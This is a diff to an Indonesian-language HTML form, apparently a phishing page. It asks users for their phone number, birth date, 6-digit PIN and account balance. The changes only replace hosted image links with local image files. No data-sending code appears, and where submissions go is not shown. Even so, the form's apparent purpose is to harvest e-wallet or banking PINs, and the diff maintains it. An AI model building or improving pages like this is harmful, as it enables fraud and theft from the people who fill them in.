--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
       margin: 0;
       padding: 0;
       margin-top: 40px;
-      background-image: url('https://i.ibb.co/8rnh5k0/1723381045176.jpg');
+      background-image: url('back.png');
       background-size: cover;
       background-repeat: no-repeat;
       background-attachment: fixed;
@@ -126,7 +126,7 @@
       </div>
       <div class="input-group">
         <label for="phone">Nomor Handphone</label>
-        <input type="tel" name="phone" id="phone" placeholder="+62 8xxx xxxx xxxx" required maxlength="12" oninput="this.value = this.value.replace(/\D/g,'').substring(0, 12)" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px; background-image: url('https://i.ibb.co/fNtsfBY/1000005366-removebg-preview.png'); background-repeat: no-repeat; background-position: 10px center; background-size: 20px;">
+        <input type="tel" name="phone" id="phone" placeholder="+62 8xxx xxxx xxxx" required maxlength="12" oninput="this.value = this.value.replace(/\D/g,'').substring(0, 12)" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px; background-image: url('ind.png'); background-repeat: no-repeat; background-position: 10px center; background-size: 20px;">
       </div>
       <div class="input-group">
         <label for="tgl_lahir">Tanggal Lahir</label>
@@ -139,14 +139,14 @@
         <label for="pin">Masukkan PIN 6 Digit</label>
         <div class="input-icon">
           <input type="password" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
-          <img src="pinn.jpg" alt="PIN Icon">
+          <img src="pin.png" alt="PIN Icon">
         </div>
       </div>
       <div class="input-group">
         <label for="balance">Masukkan Saldo</label>
         <div class="input-icon">
           <input type="tel" id="jumlahInput" name="balance" placeholder="Masukkan Saldo" required oninput="updateNominal()" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
-          <img src="sisa.jpg" alt="Saldo Icon">
+          <img src="rp.png" alt="Saldo Icon">
         </div>
       </div>
       <button type="submit" class="btn">LANJUT</button>
